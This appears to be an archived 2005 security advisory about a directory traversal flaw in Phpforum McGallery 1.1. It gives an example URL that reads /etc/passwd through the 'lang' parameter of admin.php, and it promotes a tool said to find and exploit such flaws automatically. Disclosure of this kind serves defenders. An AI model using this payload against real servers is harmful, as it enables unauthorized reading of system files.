phpforum11.txt

phpforum11.txt: Posted Jun 21, 2005; Authored by d_bug; Phpforum McGallery version 1.1 suffers from a directory traversal vulnerability.; tags | exploit; SHA-256 | c485d85c457ce5c2454a02c005e0d58a5d63527fc7c19b797142a176a708aef2; Download | Favorite | View

phpforum11.txt

Vendor: Phpforum, http://www.phpforums.net/
Product: McGallery v 1.1

Vulnerability: files reading on disk
Consequences: Web server paths are opened 
Risk: High

Description: Attacker can form the query in URL form ang get the access to the system files
Example: thttp://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd

Discoveried By D_BuG d_bug@bk.ru
NemesisSecurityTeam
http://nemesisoftware.com/

CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage.

-- 
Best regards,
 D_BuG                          mailto:d_bug@bk.ru

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

phpforum11.txt

phpforum11.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpforum11.txt

Share This

phpforum11.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems